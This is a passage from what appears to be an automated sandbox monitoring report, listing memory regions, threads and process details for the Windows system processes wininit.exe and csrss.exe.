0x7ff655c73000 end_va = 0x7ff655c74fff entry_point = 0x0 region_type = private name = "private_0x00007ff655c73000" filename = "" Region: id = 3343 start_va = 0x7ff655c75000 end_va = 0x7ff655c76fff entry_point = 0x0 region_type = private name = "private_0x00007ff655c75000" filename = "" Region: id = 3344 start_va = 0x7ff655c77000 end_va = 0x7ff655c78fff entry_point = 0x0 region_type = private name = "private_0x00007ff655c77000" filename = "" Region: id = 3345 start_va = 0x7ff655c79000 end_va = 0x7ff655c79fff entry_point = 0x0 region_type = private name = "private_0x00007ff655c79000" filename = "" Region: id = 3346 start_va = 0x7ff655c7a000 end_va = 0x7ff655c7bfff entry_point = 0x0 region_type = private name = "private_0x00007ff655c7a000" filename = "" Region: id = 3347 start_va = 0x7ff655c7e000 end_va = 0x7ff655c7ffff entry_point = 0x0 region_type = private name = "private_0x00007ff655c7e000" filename = "" Region: id = 3348 start_va = 0x7ff6560d0000 end_va = 0x7ff6560d6fff entry_point = 0x7ff6560d0000 region_type = mapped_file name = "csrss.exe" filename = "\\Windows\\System32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe") Region: id = 3349 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3350 start_va = 0x7ffaf4300000 end_va = 0x7ffaf4397fff entry_point = 0x7ffaf4300000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3351 start_va = 0x7ffaf43b0000 end_va = 0x7ffaf43bcfff entry_point = 0x7ffaf43b0000 region_type = mapped_file name = "sxssrv.dll" filename = "\\Windows\\System32\\sxssrv.dll" (normalized: "c:\\windows\\system32\\sxssrv.dll") Region: id = 3352 start_va = 0x7ffaf43c0000 end_va = 0x7ffaf43f4fff entry_point = 0x7ffaf43c0000 region_type = mapped_file name = "winsrv.dll" filename = "\\Windows\\System32\\winsrv.dll" (normalized: "c:\\windows\\system32\\winsrv.dll") Region: id = 3353 start_va = 0x7ffaf4400000 end_va = 0x7ffaf4413fff entry_point = 0x7ffaf4400000 region_type = mapped_file name = "basesrv.dll" filename = "\\Windows\\System32\\basesrv.dll" (normalized: "c:\\windows\\system32\\basesrv.dll") Region: id = 3354 start_va = 0x7ffaf4420000 end_va = 0x7ffaf4434fff entry_point = 0x7ffaf4420000 region_type = mapped_file name = "csrsrv.dll" filename = "\\Windows\\System32\\csrsrv.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll") Region: id = 3355 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3356 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3357 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3358 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3359 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3360 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7058 start_va = 0xc6b0fd0000 end_va = 0xc6b0fd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b0fd0000" filename = "" Region: id = 7346 start_va = 0xc6b0fd0000 end_va = 0xc6b0fd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b0fd0000" filename = "" Region: id = 10473 start_va = 0xc6b0fd0000 end_va = 0xc6b0fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b0fd0000" filename = "" Region: id = 10474 start_va = 0xc6b2cc0000 end_va = 0xc6b2ccffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2cc0000" filename = "" Region: id = 10475 start_va = 0xc6b2ce0000 end_va = 0xc6b2ce0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c6b2ce0000" filename = "" Thread: id = 317 os_tid = 0x4b0 Thread: id = 318 os_tid = 0x32c Thread: id = 319 os_tid = 0x1dc Thread: id = 320 os_tid = 0x1d8 Thread: id = 321 os_tid = 0x1a8 Thread: id = 322 os_tid = 0x188 Thread: id = 323 os_tid = 0x184 Thread: id = 324 os_tid = 0x180 Thread: id = 325 os_tid = 0x160 Thread: id = 326 os_tid = 0x158 Process: id = "35" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x4a9e9000" os_pid = "0x194" os_integrity_level = "0x4000" os_privileges = "0x860b14080" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x108" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 327 os_tid = 0x224 Thread: id = 328 os_tid = 0x1d4 Thread: id = 329 os_tid = 0x1ac Thread: id = 330 os_tid = 0x198 Process: id = "36" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x4a84e000" os_pid = "0x19c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x108" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3163 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3164 start_va = 0x9800000000 end_va = 0x98000bdfff entry_point = 0x9800000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3165 start_va = 0x98000c0000 end_va = 0x9800240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098000c0000" filename = "" Region: id = 3166 start_va = 0x9822b30000 end_va = 0x9822b31fff entry_point = 0x9822b30000 region_type = mapped_file name = "winsrv.dll.mui" filename = "\\Windows\\System32\\en-US\\winsrv.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winsrv.dll.mui") Region: id = 3167 start_va = 0x9822b40000 end_va = 0x9822b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822b40000" filename = "" Region: id = 3168 start_va = 0x9822b50000 end_va = 0x9822b63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822b50000" filename = "" Region: id = 3169 start_va = 0x9822b70000 end_va = 0x9822b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822b70000" filename = "" Region: id = 3170 start_va = 0x9822b80000 end_va = 0x9822b86fff entry_point = 0x9822b80000 region_type = mapped_file name = "marlett.ttf" filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf") Region: id = 3171 start_va = 0x9822b90000 end_va = 0x9822ba7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822b90000" filename = "" Region: id = 3172 start_va = 0x9822bb0000 end_va = 0x9822bb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822bb0000" filename = "" Region: id = 3173 start_va = 0x9822bc0000 end_va = 0x9822bc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822bc0000" filename = "" Region: id = 3174 start_va = 0x9822bd0000 end_va = 0x9822bd6fff entry_point = 0x0 region_type = private name = "private_0x0000009822bd0000" filename = "" Region: id = 3175 start_va = 0x9822be0000 end_va = 0x9822be0fff entry_point = 0x0 region_type = private name = "private_0x0000009822be0000" filename = "" Region: id = 3176 start_va = 0x9822bf0000 end_va = 0x9822bf1fff entry_point = 0x0 region_type = private name = "private_0x0000009822bf0000" filename = "" Region: id = 3177 start_va = 0x9822c00000 end_va = 0x9822cfffff entry_point = 0x0 region_type = private name = "private_0x0000009822c00000" filename = "" Region: id = 3178 start_va = 0x9822d00000 end_va = 0x9822d0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822d00000" filename = "" Region: id = 3179 start_va = 0x9822d10000 end_va = 0x9822d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822d10000" filename = "" Region: id = 3180 start_va = 0x9822d20000 end_va = 0x9822d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822d20000" filename = "" Region: id = 3181 start_va = 0x9822d30000 end_va = 0x9822d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822d30000" filename = "" Region: id = 3182 start_va = 0x9822d40000 end_va = 0x9822d7ffff entry_point = 0x0 region_type = private name = "private_0x0000009822d40000" filename = "" Region: id = 3183 start_va = 0x9822d80000 end_va = 0x9822d8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822d80000" filename = "" Region: id = 3184 start_va = 0x9822d90000 end_va = 0x9822d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822d90000" filename = "" Region: id = 3185 start_va = 0x9822da0000 end_va = 0x9822daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822da0000" filename = "" Region: id = 3186 start_va = 0x9822db0000 end_va = 0x9822dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822db0000" filename = "" Region: id = 3187 start_va = 0x9822dc0000 end_va = 0x9822dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822dc0000" filename = "" Region: id = 3188 start_va = 0x9822dd0000 end_va = 0x9822df3fff entry_point = 0x9822dd0000 region_type = mapped_file name = "segmdl2.ttf" filename = "\\Windows\\Fonts\\segmdl2.ttf" (normalized: "c:\\windows\\fonts\\segmdl2.ttf") Region: id = 3189 start_va = 0x9822e00000 end_va = 0x9822e00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822e00000" filename = "" Region: id = 3190 start_va = 0x9822e10000 end_va = 0x9822e48fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822e10000" filename = "" Region: id = 3191 start_va = 0x9822e50000 end_va = 0x9822e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822e50000" filename = "" Region: id = 3192 start_va = 0x9822e60000 end_va = 0x9822e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822e60000" filename = "" Region: id = 3193 start_va = 0x9822e70000 end_va = 0x9822e70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822e70000" filename = "" Region: id = 3194 start_va = 0x9822e80000 end_va = 0x9822e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822e80000" filename = "" Region: id = 3195 start_va = 0x9822e90000 end_va = 0x9822e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009822e90000" filename = "" Region: id = 3196 start_va = 0x9822ea0000 end_va = 0x9822ea1fff entry_point = 0x9822ea0000 region_type = mapped_file name = "vgaoem.fon" filename = "\\Windows\\Fonts\\vgaoem.fon" (normalized: "c:\\windows\\fonts\\vgaoem.fon") Region: id = 3197 start_va = 0x9822eb0000 end_va = 0x9822eb8fff entry_point = 0x9822eb0000 region_type = mapped_file name = "dosapp.fon" filename = "\\Windows\\Fonts\\dosapp.fon" (normalized: "c:\\windows\\fonts\\dosapp.fon") Region: id = 3198 start_va = 0x9822ec0000 end_va = 0x9822ec1fff entry_point = 0x9822ec0000 region_type = mapped_file name = "cga40woa.fon" filename = "\\Windows\\Fonts\\cga40woa.fon" (normalized: "c:\\windows\\fonts\\cga40woa.fon") Region: id = 3199 start_va = 0x9822ed0000 end_va = 0x9822ed1fff entry_point = 0x9822ed0000 region_type = mapped_file name = "cga80woa.fon" filename = "\\Windows\\Fonts\\cga80woa.fon" (normalized: "c:\\windows\\fonts\\cga80woa.fon") Region: id = 3200 start_va = 0x9822ee0000 end_va = 0x9822ee2fff entry_point = 0x9822ee0000 region_type = mapped_file name = "ega40woa.fon" filename = "\\Windows\\Fonts\\ega40woa.fon" (normalized: "c:\\windows\\fonts\\ega40woa.fon") Region: id = 3201 start_va = 0x9822ef0000 end_va = 0x9822f58fff entry_point = 0x9822ef0000 region_type = mapped_file name = "consola.ttf" filename = "\\Windows\\Fonts\\consola.ttf" (normalized: "c:\\windows\\fonts\\consola.ttf") Region: id = 3202 start_va = 0x9822f60000 end_va = 0x9822fbafff entry_point = 0x9822f60000 region_type = mapped_file name = "consolab.ttf" filename = "\\Windows\\Fonts\\consolab.ttf" (normalized: "c:\\windows\\fonts\\consolab.ttf") Region: id = 3203 start_va = 0x9822fc0000 end_va = 0x982302afff entry_point = 0x9822fc0000 region_type = mapped_file name = "consolai.ttf" filename = "\\Windows\\Fonts\\consolai.ttf" (normalized: "c:\\windows\\fonts\\consolai.ttf") Region: id = 3204 start_va = 0x9823030000 end_va = 0x982303ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823030000" filename = "" Region: id = 3205 start_va = 0x9823040000 end_va = 0x982304ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823040000" filename = "" Region: id = 3206 start_va = 0x9823050000 end_va = 0x982305ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823050000" filename = "" Region: id = 3207 start_va = 0x9823060000 end_va = 0x982306ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823060000" filename = "" Region: id = 3208 start_va = 0x9823070000 end_va = 0x982307ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823070000" filename = "" Region: id = 3209 start_va = 0x9823080000 end_va = 0x982308ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823080000" filename = "" Region: id = 3210 start_va = 0x9823090000 end_va = 0x982309ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823090000" filename = "" Region: id = 3211 start_va = 0x98230a0000 end_va = 0x98230affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098230a0000" filename = "" Region: id = 3212 start_va = 0x98230b0000 end_va = 0x98230bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098230b0000" filename = "" Region: id = 3213 start_va = 0x98230c0000 end_va = 0x98230cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098230c0000" filename = "" Region: id = 3214 start_va = 0x98230d0000 end_va = 0x98230dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098230d0000" filename = "" Region: id = 3215 start_va = 0x98230e0000 end_va = 0x98230e4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098230e0000" filename = "" Region: id = 3216 start_va = 0x98230f0000 end_va = 0x98231cbfff entry_point = 0x98230f0000 region_type = mapped_file name = "segoeuib.ttf" filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf") Region: id = 3217 start_va = 0x98231d0000 end_va = 0x98231dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098231d0000" filename = "" Region: id = 3218 start_va = 0x98231e0000 end_va = 0x98231effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098231e0000" filename = "" Region: id = 3219 start_va = 0x98231f0000 end_va = 0x98231fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098231f0000" filename = "" Region: id = 3220 start_va = 0x9823200000 end_va = 0x982320ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823200000" filename = "" Region: id = 3221 start_va = 0x9823210000 end_va = 0x982321ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823210000" filename = "" Region: id = 3222 start_va = 0x9823220000 end_va = 0x982322ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823220000" filename = "" Region: id = 3223 start_va = 0x9823230000 end_va = 0x982323ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823230000" filename = "" Region: id = 3224 start_va = 0x9823240000 end_va = 0x982324ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823240000" filename = "" Region: id = 3225 start_va = 0x9823250000 end_va = 0x982325ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823250000" filename = "" Region: id = 3226 start_va = 0x9823260000 end_va = 0x982326ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823260000" filename = "" Region: id = 3227 start_va = 0x9823270000 end_va = 0x982327ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823270000" filename = "" Region: id = 3228 start_va = 0x9823280000 end_va = 0x9823280fff entry_point = 0x0 region_type = private name = "private_0x0000009823280000" filename = "" Region: id = 3229 start_va = 0x9823290000 end_va = 0x9823291fff entry_point = 0x9823290000 region_type = mapped_file name = "vgasys.fon" filename = "\\Windows\\Fonts\\vgasys.fon" (normalized: "c:\\windows\\fonts\\vgasys.fon") Region: id = 3230 start_va = 0x98232a0000 end_va = 0x98232dffff entry_point = 0x0 region_type = private name = "private_0x00000098232a0000" filename = "" Region: id = 3231 start_va = 0x98232e0000 end_va = 0x982331ffff entry_point = 0x0 region_type = private name = "private_0x00000098232e0000" filename = "" Region: id = 3232 start_va = 0x9823320000 end_va = 0x982335ffff entry_point = 0x0 region_type = private name = "private_0x0000009823320000" filename = "" Region: id = 3233 start_va = 0x9823360000 end_va = 0x98234e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009823360000" filename = "" Region: id = 3234 start_va = 0x98234f0000 end_va = 0x98234f0fff entry_point = 0x0 region_type = private name = "private_0x00000098234f0000" filename = "" Region: id = 3235 start_va = 0x9823500000 end_va = 0x982353ffff entry_point = 0x0 region_type = private name = "private_0x0000009823500000" filename = "" Region: id = 3236 start_va = 0x9823540000 end_va = 0x982357ffff entry_point = 0x0 region_type = private name = "private_0x0000009823540000" filename = "" Region: id = 3237 start_va = 0x9823580000 end_va = 0x98235bffff entry_point = 0x0 region_type = private name = "private_0x0000009823580000" filename = "" Region: id = 3238 start_va = 0x98235c0000 end_va = 0x982369efff entry_point = 0x98235c0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 3239 start_va = 0x98236a0000 end_va = 0x98236cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098236a0000" filename = "" Region: id = 3240 start_va = 0x98236d0000 end_va = 0x9824acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098236d0000" filename = "" Region: id = 3241 start_va = 0x9824ad0000 end_va = 0x9824b0ffff entry_point = 0x0 region_type = private name = "private_0x0000009824ad0000" filename = "" Region: id = 3242 start_va = 0x9824b10000 end_va = 0x9824b10fff entry_point = 0x0 region_type = private name = "private_0x0000009824b10000" filename = "" Region: id = 3243 start_va = 0x9824b20000 end_va = 0x9824b20fff entry_point = 0x0 region_type = private name = "private_0x0000009824b20000" filename = "" Region: id = 3244 start_va = 0x9824b30000 end_va = 0x9824b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009824b30000" filename = "" Region: id = 3245 start_va = 0x9824b40000 end_va = 0x9824b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009824b40000" filename = "" Region: id = 3246 start_va = 0x9824b50000 end_va = 0x9824b8ffff entry_point = 0x0 region_type = private name = "private_0x0000009824b50000" filename = "" Region: id = 3247 start_va = 0x9824b90000 end_va = 0x9825081fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009824b90000" filename = "" Region: id = 3248 start_va = 0x9825090000 end_va = 0x982509ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825090000" filename = "" Region: id = 3249 start_va = 0x98250a0000 end_va = 0x98250affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098250a0000" filename = "" Region: id = 3250 start_va = 0x98250b0000 end_va = 0x98250bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098250b0000" filename = "" Region: id = 3251 start_va = 0x98250c0000 end_va = 0x98250cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098250c0000" filename = "" Region: id = 3252 start_va = 0x98250d0000 end_va = 0x98250dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098250d0000" filename = "" Region: id = 3253 start_va = 0x9825290000 end_va = 0x982548efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825290000" filename = "" Region: id = 3254 start_va = 0x9825490000 end_va = 0x982568efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825490000" filename = "" Region: id = 3255 start_va = 0x7df5ff190000 end_va = 0x7ff5ff18ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff190000" filename = "" Region: id = 3256 start_va = 0x7ff655156000 end_va = 0x7ff655157fff entry_point = 0x0 region_type = private name = "private_0x00007ff655156000" filename = "" Region: id = 3257 start_va = 0x7ff655158000 end_va = 0x7ff655159fff entry_point = 0x0 region_type = private name = "private_0x00007ff655158000" filename = "" Region: id = 3258 start_va = 0x7ff65515a000 end_va = 0x7ff65515bfff entry_point = 0x0 region_type = private name = "private_0x00007ff65515a000" filename = "" Region: id = 3259 start_va = 0x7ff65515c000 end_va = 0x7ff65515dfff entry_point = 0x0 region_type = private name = "private_0x00007ff65515c000" filename = "" Region: id = 3260 start_va = 0x7ff65515e000 end_va = 0x7ff65515ffff entry_point = 0x0 region_type = private name = "private_0x00007ff65515e000" filename = "" Region: id = 3261 start_va = 0x7ff655160000 end_va = 0x7ff65525ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff655160000" filename = "" Region: id = 3262 start_va = 0x7ff655260000 end_va = 0x7ff655282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff655260000" filename = "" Region: id = 3263 start_va = 0x7ff655284000 end_va = 0x7ff655285fff entry_point = 0x0 region_type = private name = "private_0x00007ff655284000" filename = "" Region: id = 3264 start_va = 0x7ff655286000 end_va = 0x7ff655286fff entry_point = 0x0 region_type = private name = "private_0x00007ff655286000" filename = "" Region: id = 3265 start_va = 0x7ff655288000 end_va = 0x7ff655289fff entry_point = 0x0 region_type = private name = "private_0x00007ff655288000" filename = "" Region: id = 3266 start_va = 0x7ff65528a000 end_va = 0x7ff65528bfff entry_point = 0x0 region_type = private name = "private_0x00007ff65528a000" filename = "" Region: id = 3267 start_va = 0x7ff65528e000 end_va = 0x7ff65528ffff entry_point = 0x0 region_type = private name = "private_0x00007ff65528e000" filename = "" Region: id = 3268 start_va = 0x7ff6560d0000 end_va = 0x7ff6560d6fff entry_point = 0x7ff6560d0000 region_type = mapped_file name = "csrss.exe" filename = "\\Windows\\System32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe") Region: id = 3269 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3270 start_va = 0x7ffaf4300000 end_va = 0x7ffaf4397fff entry_point = 0x7ffaf4300000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3271 start_va = 0x7ffaf43b0000 end_va = 0x7ffaf43bcfff entry_point = 0x7ffaf43b0000 region_type = mapped_file name = "sxssrv.dll" filename = "\\Windows\\System32\\sxssrv.dll" (normalized: "c:\\windows\\system32\\sxssrv.dll") Region: id = 3272 start_va = 0x7ffaf43c0000 end_va = 0x7ffaf43f4fff entry_point = 0x7ffaf43c0000 region_type = mapped_file name = "winsrv.dll" filename = "\\Windows\\System32\\winsrv.dll" (normalized: "c:\\windows\\system32\\winsrv.dll") Region: id = 3273 start_va = 0x7ffaf4400000 end_va = 0x7ffaf4413fff entry_point = 0x7ffaf4400000 region_type = mapped_file name = "basesrv.dll" filename = "\\Windows\\System32\\basesrv.dll" (normalized: "c:\\windows\\system32\\basesrv.dll") Region: id = 3274 start_va = 0x7ffaf4420000 end_va = 0x7ffaf4434fff entry_point = 0x7ffaf4420000 region_type = mapped_file name = "csrsrv.dll" filename = "\\Windows\\System32\\csrsrv.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll") Region: id = 3275 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3276 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3277 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3278 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3279 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3280 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7770 start_va = 0x9824b50000 end_va = 0x9824b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009824b50000" filename = "" Region: id = 7771 start_va = 0x9824b60000 end_va = 0x9824b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009824b60000" filename = "" Region: id = 7772 start_va = 0x9824b70000 end_va = 0x9824b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009824b70000" filename = "" Region: id = 7773 start_va = 0x9824b80000 end_va = 0x9824b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009824b80000" filename = "" Region: id = 7774 start_va = 0x98250e0000 end_va = 0x98250effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098250e0000" filename = "" Region: id = 7775 start_va = 0x98250f0000 end_va = 0x98250fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000098250f0000" filename = "" Region: id = 7776 start_va = 0x9825100000 end_va = 0x982510ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825100000" filename = "" Region: id = 7777 start_va = 0x9825110000 end_va = 0x982511ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825110000" filename = "" Region: id = 7778 start_va = 0x9825120000 end_va = 0x982512ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825120000" filename = "" Region: id = 7779 start_va = 0x9825130000 end_va = 0x9825130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825130000" filename = "" Region: id = 8796 start_va = 0x9825130000 end_va = 0x982513ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825130000" filename = "" Region: id = 8797 start_va = 0x9825140000 end_va = 0x982514ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825140000" filename = "" Region: id = 8798 start_va = 0x9825150000 end_va = 0x9825150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825150000" filename = "" Region: id = 9276 start_va = 0x9825150000 end_va = 0x982515ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825150000" filename = "" Region: id = 9277 start_va = 0x9825160000 end_va = 0x982516ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009825160000" 